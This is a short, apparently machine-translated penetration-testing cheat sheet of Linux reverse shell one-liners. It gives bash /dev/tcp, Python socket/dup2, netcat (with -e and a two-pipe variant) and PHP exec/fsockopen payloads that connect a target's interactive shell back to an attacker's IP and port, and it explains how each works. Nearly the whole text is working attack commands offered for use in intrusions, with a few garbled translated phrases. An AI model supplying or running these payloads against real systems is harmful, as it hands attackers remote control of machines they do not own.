In the process of penetration, reverse shell is often needed, so summarize the several postures of linux reverse shell:
bash -i >& /dev/tcp/ip/port 0>&1
bash -i Open a bash locally in interactive mode
>& Output redirection, redirect both standard output and standard error output to the remote.
/dev/tcp/ip/port/ Establish a socket connection to another machine, that is, remotely to another machine.
0>&1 Standard input is redirected to standard output, but at this time standard output has been redirected to /dev/tcp/ip/port
File, that is, on your own attack machine, which means that the input and output are on the remote
Everything in /dev/tcp/ linux is a file, and the device is also a file. Open this file, issue a socket call, and establish a socket connection
python -c //Execute the following code
"import os, socket, subprocess; // import three libraries os, socket, subprocess
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); //Create a socket using TCP
s.connect(('ip',port)); // execute the connect function to connect to the IP and port of the listening machine
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2); //Use the dup2 function of the os library to redirect.
p=subprocess.call(['/bin/bash','-i']);"
//Create a child process, pass in the parameter -i, bash is started in interactive mode.
nc -e /bin/bash ip port
-e program executed after the connection is created,
After creating the NC link, execute the local shell (/bin/bash) to complete the rebound
If NC disables the -e parameter, you can use the linux pipe character "|" to assist in the rebound, but the attacker needs to open two terminals, one for inputting commands and one for outputting results
Target machine: nc ip1 81 | /bin/bash | nc ip2 82
Attack aircraft: nc -lvvp 81 nc -lvvp 82
The pipe symbol "|" can use the output of the previous command as the input of the next command
Pass the command passed from ip1 81 to /bin/bash for execution, and pass the result to ip2 82 for output
php -r 'exec('/bash -i >& /dev/tcp/127.0.0.1/4444 0>&1');'
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
php -r run php code directly php -f run specified file
The exec() function is used to execute an external program
fsockopen (host name, port number, acceptance variables for error numbers, acceptance variables for error prompts, timeout period) Open a network connection or a Unix socket connection
Host name: the destination of sending data, the IP of receiving data;
Port number : the port of the destination of sending data, the port of receiving data;
Error number accept variable: the error number returned when socket establishment is unsuccessful;
Error prompt variable: the error prompt message returned when an error occurs;
Timeout: The maximum time to wait if the other party does not respond after the post data.
Socket is the same, not only can be used for web page transmission, but also can transmit other things, it can be used as a chat tool, downloader, ftp...Almost everything that can be transmitted over the network can be written with it
fsockopen is a relatively low-level call, which belongs to the socket call of the network system. What fsockopen returns is the unprocessed data, including the length of the data, the content of the data, and the end of the data.